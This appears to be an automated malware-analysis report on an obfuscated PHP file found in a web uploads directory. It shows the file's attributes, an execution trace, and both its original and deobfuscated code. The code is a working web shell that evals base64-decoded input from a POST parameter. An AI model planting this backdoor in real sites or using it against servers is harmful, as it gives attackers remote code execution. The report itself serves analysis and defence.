PHP Malware Analysis
1.php
md5: 5899c9f275cb3bf036f0007ac2ffcdda
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Encoding
- base64_decode (Deobfuscated, Traces)
Execution
- eval (Deobfuscated, Original)
Input
- _POST (Deobfuscated, Traces)
Deobfuscated PHP code
<?php
$mfpc56 = "6atc4d_poesb";
$jti9 = strtolower("base64_decode");
$wtlx07 = "_POST";
if (isset($_POST['nf03c87'])) {
eval($jti9($_POST['nf03c87']));
}Execution traces
data/traces/5899c9f275cb3bf036f0007ac2ffcdda_trace-1676257266.2953.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:01:32.193129]
1 0 1 0.000314 393464
1 3 0 0.000404 396816 {main} 1 /var/www/html/uploads/1.php 0 0
1 A /var/www/html/uploads/1.php 2 $mfpc56 = '6atc4d_poesb'
2 4 0 0.000444 396856 strtolower 0 /var/www/html/uploads/1.php 3 1 'base64_decode'
2 4 1 0.000460 396888
2 4 R 'base64_decode'
1 A /var/www/html/uploads/1.php 3 $jti9 = 'base64_decode'
2 5 0 0.000487 396888 strtoupper 0 /var/www/html/uploads/1.php 4 1 '_post'
2 5 1 0.000500 396952
2 5 R '_POST'
1 A /var/www/html/uploads/1.php 4 $wtlx07 = '_POST'
1 3 1 0.000526 396888
0.000558 314408
TRACE END [2023-02-13 01:01:32.193465]
Generated HTML code
<html><head></head><body></body></html>Original PHP code
<?php
$mfpc56 = "6atc4d_poesb";
$jti9 = strtolower($mfpc56[11] . $mfpc56[1] . $mfpc56[10] . $mfpc56[9] . $mfpc56[0] . $mfpc56[4] . $mfpc56[6] . $mfpc56[5] . $mfpc56[9] . $mfpc56[3] . $mfpc56[8] . $mfpc56[5] . $mfpc56[9]);
$wtlx07 = strtoupper($mfpc56[6] . $mfpc56[7] . $mfpc56[8] . $mfpc56[10] . $mfpc56[2]);
if (isset (${$wtlx07} ['nf03c87'])) {
eval($jti9 (${$wtlx07}['nf03c87']));
}